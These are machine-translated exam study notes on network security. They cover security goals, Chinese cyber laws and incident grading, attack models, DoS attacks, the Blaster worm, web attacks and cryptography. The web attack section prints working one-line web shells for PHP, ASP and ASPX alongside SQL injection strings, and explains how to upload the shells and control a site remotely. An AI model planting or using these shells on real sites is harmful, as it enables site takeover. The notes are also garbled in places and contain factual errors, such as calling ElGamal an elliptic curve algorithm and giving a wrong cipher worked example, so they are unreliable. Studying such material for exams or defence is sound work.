1. (Key Points) 1. Basic attributes of network information security (basic goals) CIA:
Confidentiality: Network information data is not allowed to be leaked or stolen during the transmission process.
Completeness: Network information data is not allowed to be tampered with during transmission.
Availability: Network information data must be available in a timely manner under authorized conditions.
Non-repudiation: Preventing users of network information from denying their actions.
Controllability: Able to manage and control information networks under authorized conditions.
-
Authenticity
Authenticity refers to the consistency between cyberspace information and objective facts in actual physical space and social space. For example, online
rumor information does not conform to the real situation and violates objective facts. -
Timeliness
Timeliness refers to the ability of cyberspace information, services and systems to meet time constraints. For example, the intelligent
control system for safe driving of automobiles requires real-time information, and the information is only valid within a specified time range. -
Compliance
Compliance means that network information, services and systems comply with laws, regulations, policies, standards and specifications. For example, online content
complies with laws, regulations and policies. -
Fairness
Fairness refers to the characteristic requirement that relevant entities of a network information system handle related tasks on equal footing, without any party having an advantage
. For example, both parties to an electronic contract meet the fairness requirements and sign the contract at the same time. -
Reliability
Reliability refers to the characteristics of a network information system that can effectively complete predetermined system functions under specified conditions and time. -
Survivability Survivability
refers to the security features of a network information system that can provide minimal and necessary service functions to support the
continued operation of business when security is compromised.
Information security is divided into four levels:
device security, data security, content security and behavioral security, among which data security is traditional.
Information theory belongs to the general theoretical basis of information security theory, including: information theory, cybernetics, and system theory.
Unique theoretical basis: cryptography, access control theory, game theory.
Information security management system: (dense network personnel)
password management, network management, equipment management, personnel management.
Network management system: (for table security)
objects, representations, security, protocols.
TOR onion routing does not have a fixed proxy server. Tor proxies are generally on layers 2-5.
Hamming code is a multiple parity error detection system with error detection and error correction functions. The code distance is greater than or equal to 3. The cyclic redundancy check can only detect errors but not error correction. It can detect r-bit errors, so the code distance is greater than 1
The "Cybersecurity Review Measures" were reviewed and adopted at the 20th office meeting of the Cyberspace Administration of China on November 16, 2021, and have been approved by the National Development and Reform Commission, the Ministry of Industry and Information Technology, the Ministry of Public Security, the Ministry of National Security, and the Ministry of Finance With the consent of the Ministry of Industry and Commerce, the Ministry of Commerce, the People's Bank of China, the State Administration for Market Regulation, the State Administration of Radio and Television, the China Securities Regulatory Commission, the State Administration of Secrecy, and the State Cryptozoology Administration, it is hereby announced and will come into effect on February 15, 2022.
Network Infrastructure Law: Starting on September 7, 2022
The National Computer Network Emergency Response Technology Coordination Center (referred to as the "National Internet Emergency Response Center", the English abbreviation is
CNCERT or CNCERT/CC) is the leading unit in China's computer network emergency response system and a national emergency center.
At present, the National Computer Network Emergency Response Technology Coordination Center has been established in China, referred to as the "National Internet Emergency Response
Center ", the English abbreviation is CNCERT or CNCERT/CC. The center was established in September 2002 as a non-governmental and non-profit network security organization. The Technical Coordination Organization is a national cybersecurity emergency agency under the leadership of the Office of the Central Cybersecurity and Information Technology Commission. As a national emergency center, CNCERT’s main responsibilities are: in accordance with the policy of “active prevention, timely detection, rapid response, and ensuring recovery”
. "The policy of
Under the overall coordination of the Central Cyberspace Administration of China, the Cybersecurity and Informatization Leading Group of the Ministry of Industry and Information Technology leads the emergency management of public Internet network security emergencies and is responsible for the unified command and coordination of particularly major public Internet network security emergencies.
The national cybersecurity and informatization department coordinates relevant departments to establish and improve cybersecurity risk assessment and emergency response mechanisms, formulate
contingency plans for cybersecurity incidents, and organize regular drills.
In 2017, the Cyberspace Administration of China issued the "National Cyber Security Incident Emergency Plan", which classified network information security incidents into malicious program incidents, network attack incidents, information destruction incidents, information content security incidents, equipment and facility failures, catastrophic incidents and other incidents. There are 7 basic categories such as information security incidents.
According to the degree of impact of cyber security incidents on national security, social order, economic construction and public interests, cyber
security incidents can be divided into four levels: particularly major cyber security incidents, major cyber security incidents, major cyber security incidents and general cyber security Incidents,
according to the scope of social impact and degree of harm, public Internet network security emergencies are divided into four levels: particularly major incidents,
major incidents, major incidents, and general incidents.
3.1 Extraordinarily Major Incidents A
particularly major network security incident meets one of the following circumstances:
(1) A large number of Internet users across the country are unable to access the Internet normally;
(2) The resolution efficiency of the .CN national top-level domain name system drops significantly;
(3) More than 100 million people Leakage of Internet user information;
(4) Large-scale outbreak of network viruses across the country;
(5) Other network security incidents that cause or may cause particularly significant harm or impact.
3.2 Major Incidents A
major network security incident meets one of the following circumstances:
(1) A large number of Internet users in multiple provinces are unable to access the Internet normally;
(2) There are serious abnormalities in access to influential websites or platforms across the country;
(3) Serious abnormalities in access to large-scale domain name resolution systems;
(4) Information leakage of more than 10 million Internet users;
(5) Large-scale outbreaks of network viruses in multiple provinces;
(6) Other networks that cause or may cause major harm or impact security incident.
3.3 Major incidents A major
network security incident meets one of the following circumstances:
(1) A large number of Internet users in a province cannot access the Internet normally;
(2) There are serious abnormalities in access to influential websites or platforms in the province;
(3) Information leakage of more than 1 million Internet users;
(4) Large-scale outbreak of network viruses within a province;
(5) Other network security incidents that cause or may cause greater harm or impact.
3.4 General incidents
If any of the following situations are met, it is a general network security incident:
(1) A large number of Internet users in one city cannot access the Internet normally;
(2) More than 100,000 Internet users’ information is leaked;
(3) Others cause or may cause general network security incidents. Cybersecurity incidents that harm or impact.
The China Cybersecurity Review Technology and Certification Center (CCRC, formerly the China Information Security Certification Center) is a
specialized agency responsible for implementing network security review and certification.
The "Regulations on the Management of Commercial Cryptography" promulgated and implemented by the State Council in 1999 stipulates: "Commercial cryptography as mentioned in these regulations
refers to the cryptography technology and cryptography products used for encryption protection or security authentication of information that does not involve state secrets.
The "Cryptography Law of the People's Republic of China" clearly stipulates that passwords are divided into core passwords, ordinary passwords and commercial passwords, and classified management is implemented. Core passwords and ordinary passwords are used to protect state secret information, are state secrets, and are strictly and uniformly managed by the password management department in accordance with the law.
Personal information and business data collected during the provision of services shall be stored and used in mainland China, with a retention period of no less than 2 years; unless otherwise provided by laws and regulations, personal information and business data shall not be leaked out.
The basic technical requirements for network information security
include network physical environment security, network information security authentication, access control, security and confidentiality, vulnerability scanning, malicious code protection, and network information content security. Safety monitoring and early warning, emergency response, etc.
Network security management methods mainly include risk management, hierarchical protection, defense in depth, hierarchical protection, emergency response and PDCA (Plan-Do-CheckAct) method
The information standard system consists of five levels of standards:
international standards, national standards, industry standards, local standards and enterprise standards.
2. Basic functions of network information security:
defense, monitoring, emergency response, and recovery.
3. Network information security management elements:
network management objects, network threats, network vulnerabilities, network risks, and network protection measures.
Communication hiding technology:
port customization technology,
port reuse technology,
communication encryption technology,
covert channel technology
4. Network information security risk control methods:
avoid risks, transfer network risks, reduce threats, eliminate vulnerabilities, and monitor risks.
5. Network information security management process:
Determine network information management objects
and evaluate the value of network information security objects.
Identify threats to network information security objects.
Identify the vulnerabilities of network information security objects
. Determine the risk level of network information security objects.
Develop a network information security defense system.
Implement network security management plans.
Operate, maintain and manage the network.
2 (key points), 1. Network attack model:
Attack tree model: a tree structure in the form of and-or, which performs security threat analysis on the target and adds nodes without changing the original node. It is used by the read team for penetration testing and is used by blue Team is used for defense; this model can use the opinions of multiple people to integrate into the attack tree, and can model complex attack scenarios. It cannot be used to model multiple attempted attacks, and it cannot model cyclic events.
mitre att&ck model: A data model extracted from real network attack data to provide specific implementation methods of attack activities; used for penetration testing and network threat intelligence collection.
Network kill chain model (kill chain):
target reconnaissance ,
weapon construction,
payload delivery,
vulnerability exploitation,
installation and implantation,
command and control,
target action
There are four basic types of common harmful behaviors of network attacks:
information leakage attacks,
integrity destruction attacks,
denial of service attacks, and
illegal use attacks.
2. General attack process:
Hide attack source
, collect target information,
mine target vulnerability information,
obtain target access rights,
hide attack behavior,
implement attack
, open backdoor,
clear attack traces
Password cracking:
Establish a network connection with the target network service;
select a user list file and dictionary file;
select a group of users and passwords in the user list file and dictionary file according to the network service protocol, and send the user
name and password to the target network Service port;
detect the information returned by the remote service to determine whether the password attempt is successful;
then obtain another set of users and passwords, and repeat the loop test until the password user list file and dictionary file are selected
.
Prevention strategies for buffer overflow attacks:
Prevention strategies for system management:
shut down unnecessary privileged services; patch program vulnerabilities in a timely manner.
Precautionary strategies during software development:
write correct code; buffers are not executable; improve C language function libraries.
Vulnerability prevention technology:
address space randomization technology; data execution blocking; stack protection.
Common types of malicious code include computer viruses, network worms, Trojan horses, backdoors, logic bombs, botnets,
etc.
W32.Blaster.Worm is a network worm that exploits DCOM RPC vulnerabilities to propagate, and its propagation ability is very strong.
Computer systems infected with worms run unstable and will constantly restart. And the worm will also perform a denial of service attack on windowsupdate.com, preventing the victim users from getting the patch for this vulnerability in a timely manner.
(1) Create a mutex named BILLY. If this mutex exists, the worm will abandon the infection and exit.
(2) Add the following key value to the registry: "windows auto update"="msblast.exe" and add it to: HKEY LOCAL MACHINE\SOFTWARE\Microsoft\ Windows\Current Version\Run.
This will allow the worm to run in the system It can run automatically when restarted.
(3) The worm generates a list of attack IP addresses and attempts to infect computers in the list. The worm initiates a
TCP port 135 connection to machines with DCOMRPC vulnerabilities to infect them.
(4) Bind a cmd.exe backdoor to the TCP4444 port.
(5) Monitor on UDPport69 port. If a request is received, Msblast.exe will be sent to the target machine.
(6) Send a command to the remote machine so that it can contact the infected machine and download Msblast.exe.
(7) Check the current date and month. If the current date is the 16th or later, or the current month is between September and December, the
W32.Blaster. Worm worm will launch a TCP synchronization storm denial of service attack on windowsupdate.com.
DOS attack classification:
Teardrop attack is a denial of service attack and an attack method based on pathological fragmentation of UDP packets. In English, "Tear" means "tears" and "drop" means "dropping". As the name suggests, the Teardrop attack is a tear-dropping attack method. It can be seen that its destructive power is very powerful. It
mainly targets early Microsoft operating systems (95, 98, 3.x, nt). In recent years, some people have discovered that the 2.x version of Android System, 6.0 IOS system attack is effective.
Attack effect
: The attacker will have blue screen, restart, freeze, etc.
Principle of Teardrop attack. The
working principle of Teardrop attack is that attacker A sends some fragmented IP packets to victim B, and deliberately changes "13 The "bit fragment offset" field is set to an incorrect value (it can overlap with the previous fragment data, or it can be staggered). When B combines this kind of forged fragment message containing an overlapping offset, some operating systems receive When forged fragmented data packets containing overlapping offsets are received, system crashes and restarts will occur.
A WinNuke attack is a denial of service attack. WinNuke attack is also called out-of-band transmission attack. It is characterized by attacking the target port. The target ports being attacked are usually 139, 138, 137, 113, and 53, and the URG bit is set to "1", which is emergency mode.
Anti-attack method: Properly configuring firewall equipment or filtering routers can prevent this attack method (drop the packet), and audit this attack (record the time when the event occurs, the MAC address and IP address of the source host and target host) MAC).
LAND attack (Local Area Network Denial attack, English: Local Area Network Denial attack, abbreviation: LAND attack) is a type of denial of service attack (DoS attack) by sending carefully constructed spoofed data with the same source address and destination address. package, causing the target device that lacks corresponding protection mechanisms to become paralyzed. This attack method was first proposed by someone under the name "m3lt" in 1997, and reappeared many years later in operating systems such as Windows Server 2003 and Windows XP SP2.
This attack method uses specially constructed TCP SYN packets (usually used to open a new connection), causing the target machine to open an empty connection with the source and destination addresses being its own IP address, continuously responding to itself, and consuming the system. resources until they collapse. This attack method is not the same as the SYN flood attack
Smurf attack is a virus attack, named after the program "Smurf" that originally launched this attack. This attack method uses a combination of IP spoofing and ICMP reply methods to flood the target system with a large number of network transmissions, causing the target system to refuse to serve normal systems.
A Smurf attack works by flooding the victim host with ICMP reply request (ping) packets with the reply address set to the broadcast address of the victim network, eventually causing all hosts on the network to reply to the ICMP reply request, causing network congestion. More sophisticated Smurfs change the source address to a third-party victim, eventually causing the third-party to crash.
3. Ddos attack steps:
Scan a large number of hosts to find hosts that can be attacked.
Attack a vulnerable host and gain control.
On the compromised host, install the client program.
Use the host that has been successfully attacked to scan and attack other hosts.
When the number of successfully attacked hosts reaches a certain number, the main control terminal controls these hosts to initiate an attack on the featured target host.
Common network eavesdropping techniques mainly include: network sniffing and man-in-the-middle attacks.
SQL injection (numeric injection and character injection)
(1) SQL injection principle
• In web services, a three-layer architecture model is generally adopted, namely: browser + web server + database; due to
programming vulnerabilities in web service scripts, network attacks The attacker inserts SQL commands into input fields in web forms or page request
search strings to trick the server into executing malicious SQL commands.
(2) Injection form
•http://xxx. xxx.xxx/abc.asp?? p=YY
•Execute injection: http://xxx.xxx.xxx/abc.asp??
p=YY and user>0 The user name can be obtained from the error message of the operation.
• Perform injection: http://xxx. xxx.xxx/abc.asp?? p=YY and (Select password from login
where user_name'admin')>0 The password can be obtained from the error message of the run.
SQL injection defense uses SQL precompilation, PHP precompiled statement: prepare
1' or '1'='1
One-sentence Trojan principle
PHP’s one-sentence Trojan: <?php @eval($_POST(cmd);?>
One sentence of asp is: <%eval request (“pass”)%>
One sentence of aspx is: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>
Utilize the file upload vulnerability to upload a one-sentence Trojan to the target website, and then you can obtain and control the entire website directory locally through chopper.exe.
@ means that even if there is an error in execution later, no error will be reported. The eval() function indicates that all statement strings in parentheses will be executed as code. $_POST['attack'] indicates that the attack parameter value is obtained from the page.
The invasion can be successful if the following three conditions are met:
(1) The Trojan is successfully uploaded and has not been killed;
(2) The path of the Trojan is known;
(3) The uploaded Trojan can run normally.
CSRF cross-site request forgery attack:
defense: try to use post, add difficult code, verify referrer, token, add custom header
XSS hazards:
web page hanging, cookie theft, ddos attack on client browser, phishing attack, hijacking user web behavior, worm web2.0 outbreak
XSS prevention: filter input, encode output, set cookie to http-only, change brackets to > and <, use escape library in js
3 (Key Points) Cryptography
Modern cryptography believes that it is desirable for passwords to withstand known plaintext attacks.
Article 1 This law is formulated to regulate the application and management of cryptography, promote the development of cryptography, ensure network and information security, safeguard national security and social public interests, and protect the legitimate rights and interests of citizens, legal persons and other organizations.
Article 2 The term "cryptography" as used in this Law refers to technologies, products and services that use specific transformation methods to encrypt, protect and authenticate information.
Article 3 Cryptocurrency work adheres to the overall national security concept, follows the principles of unified leadership, hierarchical responsibilities, innovative development, serving the overall situation, and management in accordance with the law to ensure security.
Article 4: Uphold the leadership of the Communist Party of China over cryptography work. The central leadership body for cryptography exercises unified leadership over national cryptography work, formulates major national cryptography work guidelines and policies, coordinates major national cryptography matters and important work, and promotes the construction of the national cryptography rule of law.
Article 5 The national cryptography management department is responsible for managing cryptography work nationwide. Local cryptography management departments at or above the county level are responsible for managing cryptography work in their respective administrative regions.
State agencies and units involved in cryptography work are responsible for the cryptography work of their own agencies, units or systems within the scope of their duties.
Article 6 The state implements classified management of passwords.
Article 15 of the "Law of the People's Republic of China on Guarding State Secrets" The period for keeping state secrets secret shall be limited to a necessary period based on the nature and characteristics of the matter and the need to safeguard national security and interests; if the period cannot be determined, the period shall be determined Decryption conditions. Unless otherwise specified, the confidentiality period of state secrets shall not exceed thirty years at the top secret level and twenty years at the confidential level.
Computer information systems involving state secrets must not be directly or indirectly connected to the Internet or other public information networks, and must be physically isolated.
Passwords are divided into core passwords, ordinary passwords and commercial passwords.
Measuring the security of a cryptographic system:
actual security can be calculated as security: existing computing and capabilities cannot crack it.
Theoretical safety can prove safety: according to a mathematical puzzle.
Extreme security can be unconditionally safe: it cannot be cracked even with enough calculation and time.
The main definition of the set protocol:
encryption algorithm application,
certificate message,
purchase message,
payment message,
participant message
1. Cryptography and cryptanalysis together constitute cryptography.
2. According to the prerequisites that cryptanalysts have when deciphering, people usually divide the types of cryptanalysis attacks into five types.
Ciphertext-only attack: the most disadvantageous to hackers.
Known-plaintext attack: attack through pairs of plaintext and ciphertext.
Chosen plaintext attack: attacks computer systems and files
Chosen ciphertext attack: attacks public key cryptography and digital signatures.
Cipher text verification attack
According to the prerequisites that cryptanalysts have when deciphering, people usually divide cryptanalysis attack types into five types, which are
described below.
(1) Ciphertext-only attack. The cryptanalyst only has one or more
ciphertexts encrypted with the same key and no other information available.
(2) Known-plaintext attack. The cryptanalyst only knows some plaintext
and the corresponding ciphertext under the current key.
(3) Choose-plaintext attack. The cryptanalyst can obtain
the ciphertext corresponding to the plaintext selected by him under the current key.
(4) Ciphertext verification attack. For any selected ciphertext, the cryptanalyst
can determine whether the ciphertext is legal or not.
(5) Chosen-ciphertext attack. In addition to challenging the ciphertext, the cryptanalyst can obtain
the plaintext corresponding to any chosen ciphertext.
Differential analysis is a chosen plaintext attack
Quantum algorithms include shor and grover, which can effectively attack rsa, elliptic curve, and dh.
Cryptography and cryptanalysis together constitute cryptography.
There are three main methods for cryptanalysts to attack passwords: exhaustive attacks, mathematical analysis attacks, and physics-based attacks.
To prevent replay attacks: add timestamps, verification codes, one-time passwords, and random values (random values must satisfy unpredictability and randomness).
Man-in-the-middle attack prevention: Two-way authentication of the identity of the sender and receiver, using a hash function.
The DH key exchange protocol is vulnerable to man-in-the-middle attacks.
Differential attack: Select a plaintext with a certain difference (known plaintext attack), and after a cryptosystem is used, output the corresponding ciphertext with a specific difference to obtain the key. Mainly for des encryption, the des using s box method can be defended.
Differential attacks attack cryptographic algorithms by comparing and analyzing the propagation of changes in plaintext after encryption. Differential attack is an attack method proposed against the symmetric block encryption algorithm. It seems to be the most effective method to attack DES (it seems because differential attack requires a lot of space complexity, and may actually not be as reliable as brute attack). operability). Before 2000, differential attacks were proven to be effective for one cycle of MD5, but it seemed difficult to work for all four cycles. But with the progress of research on MD5, the situation has changed.
Linear attack: It is a known plaintext attack method. By finding an effective linear expression between plaintext and ciphertext, the block cipher is distinguished from random substitutions, and the key is recovered.
3. Cryptosystem classification:
private key cryptography,
public key cryptography,
hybrid cryptography
4. Encryption algorithm: Anti-theft and eavesdropping: symmetric and asymmetric.
Block cipher working mode:
1. Electronic codebook mode ECB mode is generally only suitable for security protection of small data amounts of character information, such as key protection. It is easy to expose plain text data, difficult to resist statistical analysis attacks, and can be encrypted in parallel. Encryption and decryption error propagation is bounded
2. CBC mode (also called block cipher connection mode) is suitable for transmitting long messages and is the standard for SSL and IPSec.
CBC has two modes: plaintext link mode and ciphertext connection mode. In
plaintext link mode, encryption and decryption errors are propagated unbounded
; The text link mode encryption error propagation is unbounded, and the decryption error propagation is bounded.
Cannot be encrypted in parallel and can resist replay attacks.
3. CFB is also called password feedback mode, which is suitable for data integrity authentication and unbounded propagation of encryption and decryption errors.
4. OFB is also called output feedback mode. The propagation of encryption and decryption errors is bounded. It can encrypt data of any length, such as images and voices. Bit errors will not propagate. The propagation of encryption and decryption errors is bounded.
5. CTR counter mode, encryption and decryption error propagation is bounded, not suitable for complete data integrity authentication, suitable for computer random file encryption.
Symmetry:
DES: Initial 64 bits, excluding parity bits, the actual available bits are 56 bits, then 48 bits after 2 bits left rotation, 64 data packet length.
The effective key length of DES is 56 bits, the data packet length is 64 bits, the subkey length is 48 bits, the output of function F is 32 bits, 16 rounds of encryption, each round of key length is 48 bits, the
DES key is shorter, only 2 of 56 In power, there are weak keys and semi-weak keys. There are 4 weak keys and 12 semi-weak keys.
DES algorithm process:
initial replacement IP, generation of 16 48-bit subkeys, 16 rounds of feistel iteration (extended replacement E, S box search, replacement P, inverse initial replacement IP-1)
1. Initialization replacement IP (hexadecimal Plain text, each bit is converted to 4 binary numbers, then converted to decimal, and then filled in corresponding to the initial replacement IP table. The upper half of the table Li and the lower half are Ri):
2. Generate 16 48-bit subkeys
3. 16 rounds of feistel structure iteration (extended substitution E, S-box substitution, substitution P)
4. Inverse initial permutation IP-1. Finally, the left and right are swapped, with R on the left and L on the right.
3DES: 3 56-bit DES, a total of 168 bits, and the effective key is 112 bits.
Encryption process: encryption-decryption-encryption,
decryption process in reverse: decryption-encryption-decryption
3DES is relatively slow to implement in software
and can resist exhaustive attacks
On October 25, 1999, NIST adopted Triple DES (Triple Data Encryption Algorithm, TDEA) as the national standard of the transitional department to enhance the security of DES, and began to solicit AES (Advanced Encryption Standard) algorithms. Among them, the working mechanism of the TDEA algorithm is to use DES to perform an "encryption-decryption-encryption" operation on the plain text, that is, the DES-encrypted ciphertext is decrypted and then encrypted, and the opposite is done for decryption.
Wep wireless uses a static secret key, the standard 64-bit WEP key length is 40, and the initial vector is 24
The state stipulates that the wireless key negotiation algorithm uses ecdh
Signature algorithm ecdsa
The national wireless security wapi
key management method is based on certificates and pre-shared keys psk
The key management methods of international wireless security wpki
optimized elliptic curve cryptography and compressed x.509
WAPI include certificate-based and pre-shared key-based methods.
WPKI (Wireless Public Key System) is a key and certificate management platform that follows established standards based on a network-free environment. The encryption algorithm used by the platform is an optimized elliptic curve encryption algorithm.
WSN is a node-limited wireless network that provides a lightweight link data encryption algorithm tingsbsec. The encryption algorithm can be rc5 and skipjiak, which is a CBC feedback mechanism encryption working mode.
The media access control sublayer of wsn is easily vulnerable to denial of service attacks. Wormhole attacks usually involve more than two malicious nodes cooperating to launch attacks. Combining sequence ciphers and block ciphers to achieve security.
AES: The block length is 128 bits, and the key length is 128 bits, 192 bits, and 256 bits. aes is composed of four different modules, which are replaced by non-linear bytes one by one using s boxes.
AES has no weak keys and
can resist exhaustive attacks. The key sizes are 128, 192, and 256 powers of 2, which are found in every sand on the earth.
It can resist linear attacks. After 4 rounds of transformation, linear attacks will be powerless.
It can resist differential attacks. After 8-bit transformation, differential attacks are powerless.
Rijindael's data length and key length are variable and can be adapted to different environments.
AES encryption algorithm steps: an initial round key addition, a standard round function of Nr-1 rounds, a non-standard round function in the last round, and no column obfuscation transformation in the last round.
AES uses a permutation wheel function and an SP structure:
1. Nonlinear layer, S-box transformation, direct confusion effect,
2. Linear mixing layer, diffusion effect,
3. Key encryption layer.
Suitable for personal home networks, WPA2-PSK supports both TKIP and AES encryption methods. It
uses TKIP protocol to solve the security issues in WEP protocol.
AES's byte replacement s-box algorithm:
This box consists of a square table composed of 16*16 bytes, containing 256 possible transformations represented by 8-bit values.
Example: Suppose the current state is: 51 67 -------- In the box search, the first number in each group is the row, the second number is the column, and the intersection is the result: 51 corresponds to 5x in the row, and the column corresponds to 1x, so 51=d1,67=85
IDEA: (International) The packet length is 64 bits and the key length is 128 bits. The same algorithm can be used for encryption and decryption. It is mainly used for PGP emails and can also be used for data encryption algorithms.
The IDEA algorithm can accept 64-bit block encryption processing. The same algorithm can be used for both encryption and decryption. The design idea of the algorithm is to "mix operations from different algebraic groups."
PGP email security: RSA is used for key management, IDEA is used for data encryption, and MD5 and RSA are used for integrity and digital signature algorithms.
PGP applies a variety of cryptographic technologies. Among them, the key management algorithm uses RSA, data encryption algorithm IDEA, integrity detection and digital signature algorithms. MD5 and RSA and random number generators are used. PGP organically integrates these cryptographic technologies. Utilizing the respective advantages of symmetric and asymmetric encryption algorithms, a relatively complete cryptosystem is implemented.
SM1: Domestic symmetric encryption group length and key length are both 128 bits. The security and confidentiality strength of the algorithm and related software and hardware implementation performance are comparable to AES.
SM4: Domestic symmetric encryption group length and key length are both 128 bits, and both the encryption algorithm and the key expansion algorithm adopt a 32-round nonlinear iteration structure. Used by national wireless LAN products,
the data processing units are bytes (8 bits) and words (32 bits).
The cryptographic algorithm uses involution operations (the encryption and decryption algorithms are the same), inputs 32 round keys, and outputs 128-bit ciphertext, 4 words.
Algorithm structure: The round function has 32 iterations, and each round uses a round key.
Password knot: adopts an asymmetric feistel structure (different from des).
Use nonlinear change T, first S transformation and then L transformation.
Word linear component L transform: its diffusion effect: 32-bit input and output.
Round function: input data 128 bits, 4 32-bit words, input round key rk, 32-bit words, output is also 32-bit words
Key expansion algorithm: constant FK, use some constant 32-bit words in key expansion.
S box non-linear byte transformation, 8-bit input and output, the high-order byte is the row number, the low nibble is the column number, and four S-boxes are used for parallel replacement. Formula: b=s_box(a)
For example: Suppose the S box input is EF, then E is the intersection of rows and F is the column, which is the result sbox('ef')='84'
AES, DES, and SM4 all use S box nonlinearity , Comparison:
AES consists of 16 S boxes, the operation is reversible, and the output and input are the same.
DES consists of 8 S-boxes, and the operation is irreversible. Each S-box input is 6 bits and the output is 4 bits.
SM4 is composed of 4 S boxes.
What are the problems with symmetric cryptosystems:
key distribution problems, key number problems, and digital signature problems.
Public key cryptography security: Ensure data confidentiality and authenticity while ensuring data confidentiality and authenticity.
Public key cryptography:
Public key cryptography hybrid model of encryption and authentication:
Digital envelope (solve the confidentiality of data in transmission):
Digital signature:
Digital signature is based on a combination of public key cryptography and one-way secure hash function algorithm.
Digital signature: Verifies the authenticity, non-forgery, non-changeability, non-repudiation, and message integrity of the signature.
ELGamal cryptography, also called elliptic curve algorithm, contains three parts: finite field, order, and primitive element.
p and q are shared by all users in the system.
Features: The introduction of random number methods increases the uncertainty of encryption, and the same plaintext may produce different ciphertexts.
The security of the cryptographic system is based on the difficulty of discrete mathematical logarithm problems in finite fields. The random numbers in encryption must be one-time.
RC4 sequence cipher:
It is a sequence cipher based on non-linear data table transformation. Password
scheduling algorithm (KSA for short) and pseudo-random generation algorithm (PRGA for short)
storage space: 258 bits, 256 box byte S table, plus n And the pointers I and J2 bytes are a total of 258 bits. The s box, I, and J together are called a state machine.
It is resistant to brute force attacks because each state generates a key character, and the elements have 2 raised to the 1600th power.
SSL, TLS, and WEP protocols all use the RC4 algorithm.
ZUC Zu Chongzhi algorithm, used in mobile communications, is the core of 3GPP confidentiality algorithm EEA3 and integrity algorithm EIA3.
SM9: Identification cryptographic algorithm. SM9 is mainly used for user identity authentication. The encryption strength of SM9 is equivalent to the RSA encryption algorithm with a 3072-bit key.
5. Asymmetric:
RSA: The RSA key is at least 500 bits long, and 1024 bits is generally recommended. Mainly used for key management and data signing.
SM2: Asymmetric encryption, used for key exchange, digital signature, using prime field 256-bit ECC elliptic curve cryptography mechanism.
The difference between rsa and ecc: the content after rsa signature is encrypted ciphertext, while the principle of ecc signature is to use the key to generate two numbers and append them to the original plaintext before sending them together.
6. Authentication algorithm: tamper-proof, integrity check (2 types of hash authentication:
md5: data block length 512 bits, message digest algorithm 128-bit hash value.
Hash function: formula h=H(M): also known as: message digest, hash function, hash function, has error detection capability, that is, changing any one or more bits of the message will cause the hash result to change.
The hash function provides confidentiality, message authentication, and digital signatures.
Basic attributes of hash:
One-way: the corresponding message cannot be deduced from the hash code, and it is confidential.
x of h is computationally infeasible
Weak collision resistance: unable to find another message with the same hash value as a given message, message authentication and digital signature.
h(x)=h(y) is computationally infeasible
Strong collision resistance: Resist birthday attack (a group of more than 50 people, the same relationship is N=3)
The pair of h(x)=h(y) is not feasible
hash structure:
sha1: Secure hash algorithm
outputs a 160-bit hash message value, the input message group length is 512 bits, and the input message length cannot exceed the 64th power of 2.
The sha1 algorithm uses a 160-bit buffer to store intermediate results and final summary information. The buffer consists of five 32-bit registers A, B, C, D, and E. The five add up to 160 bits.
Compression function processing: 4 rounds of function compression, 20 operations (f1, f2, f3, f4) in each round until the end of the last 512 group.
Compression function processing: Ft(B, D, C) uses a basic logic function for the tth step. The input is 96 bits and the output is 32 bits.
Message filling: It must satisfy (448 + X) mod 512 = 448, which means that the remainder of the left number divided by 512 is 448
sha1 structure:
SM3: The hash algorithm is equivalent to sha1:
the hash key length is 256 bits, the data block length is 512 bits, and the (hash, hash) algorithm gives the calculation method and calculation steps of the hash function algorithm, and gives operation examples. This algorithm is suitable for digital signature and verification, message authentication code generation and verification, and random number generation in commercial cryptographic applications.
7. Pre-shared key: Identity authentication, anti-impersonation, that is, password (password: a combination of uppercase and lowercase numbers)
8. DH algorithm: used to protect the security of password transmission on the Internet and encrypt passwords (mixing symmetric algorithms and asymmetric algorithms together: first use asymmetry to calculate both sides and make the data equal, then use symmetry, which is equivalent to The password is not transmitted online)
The difficulty of solving the discrete logarithm problem based on the DH key exchange protocol
DH Diffie-Hellman algorithm is asymmetric encryption,
The DH key exchange protocol is vulnerable to man-in-the-middle attacks.
DH formula: C^d = M mod P. Under the premise of knowing C and P, it is easy to find M from d. d is the random number of both parties
C and P can be generated by either party, P needs to be a large enough prime number, C can be a smaller integer, and C and P do not need to be kept secret.
The last 2 in the figure below is a shared key that both parties want to obtain. Replace all G in the picture below with C in the formula above
9. Symmetric cipher is also called block encryption
M represents plain text, C represents cipher text, K key space, e encryption algorithm, d decryption algorithm, Ke represents encryption key, and Kd represents decryption key.
All the following mods are about finding the remainder. If the number in front of the mod is less than the number in the back, then the result cannot be divided and it will be equal to the previous number. For example: 12 mod 33 = 12
10. The substitution cipher (one of the classical cryptosystems)
encrypts the position vertically (cannot withstand known plaintext attacks),
for example: plaintext: love you
love
you
Cipher text: ly oo vu e0 (fill in 0 if it doesn’t match), remember to write a vertical line between 0
11. Substitute ciphers (also one of the classical ciphers): (additional cipher, multiplicative cipher, affine cipher), these three are afraid of exhaustive attacks.
Addition password formula: (a+k) mod n, and 0<k<n, a is plain text, which will be given in question k, n is 26, because there are only 26 letters, mod means dividing two numbers, not counting When using decimals, use the number below the division formula. For example, 200mod26=18
For example: the known plain text love, l is based on 26 letters (the addition password should be calculated from the 0th position (located in the 11th position, o in the 14th position, v in the 21st position, e in the 4th position, and then put this Several numbers are substituted into the above formula a for calculation. After calculating the corresponding numbers, these numbers correspond to the 26 letter positions (counting from 0). Then write the numbers according to the 26 letters to get the password. Wen.
The famous addition cipher is the Caesar cipher. The Caesar cipher is K=3, which means that all letters are shifted back by 3 places. If you encounter the last letter z, then start the cycle with a and count down 3 digits.
Multiplicative password formula: (a *k) mod n, and k must be relatively prime with n. By default, n is the largest letter, 26. K and n must be relatively prime. This number of digits is the same as the above addition password, and it also starts from 0. Calculated. For example: plain text ab, the default K=5
according to the formula (axk) mod 26 = 0. Substitute it into: (0x5) mod 26 = 0. Divisibility is not enough to divide by 0, so a is still 0 after encryption, so the 0th position is the first letter a; then calculate b: (bxk) mod n = 0 and substitute (1x5) mod 26 = 0 to get the number 5, so the fifth letter is f, remember it is the 13th digit starting from 0. So the ciphertext of plaintext ab is af
Anti-shot cipher formula (a combination of additive cipher and multiplicative cipher, also one of the classical ciphers):
(a k0 + K1) mod n, 0<=K1<n, and 0<k1<n, k and n must be relatively prime That is, gcd(k,n)=1. k0 cannot be equal to 1, and n generally defaults to 26.
The number of digits is the same as the above addition password, and it also starts from the 0 digit.
For example: K= (7, 3) encrypt hot:
(7x7+3) mod 26 = 0 H is the 7th bit
(7 14+3) mod 26 = 23 O is the 14th bit
(7*19+3) mod 26 = 6 T is the 19th position.
